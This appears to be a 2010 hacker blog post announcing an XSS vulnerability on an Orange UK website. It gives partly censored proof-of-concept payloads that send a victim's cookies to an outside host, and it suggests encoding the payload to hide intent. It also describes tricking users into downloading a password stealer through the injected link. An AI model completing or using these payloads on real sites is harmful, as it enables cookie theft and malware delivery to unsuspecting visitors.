Orange Vulnerable to XSS and phishing
Posted by isrtinkode
on February 19, 2010
____ _ _ _ __
/ __ \ | | | | |/ /
| | | |_ __ __ _ _ __ __ _ ___ | | | | ' /
| | | | '__/ _` | '_ \ / _` |/ _ \ | | | | <
| |__| | | | (_| | | | | (_| | __/ | |__| | . \
\____/|_| \__,_|_| |_|\__, |\___| \____/|_|\_\
__/ |
|___/
# TinKode & La Magra@ Romania
XSS – [Cross-Site
Scripting]Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:
Link:
http://censored/index.php?module=censored=">censored src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored"
src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicous code in base64,
hex, etc in order to hide our intentions! 
Another example for this vulnerability is phishing!
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:
http://website.orange.co.uk/censored
Replace the winamp link with another one(eg: a
stealer) and you can trick a lot of people.Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode
Posts
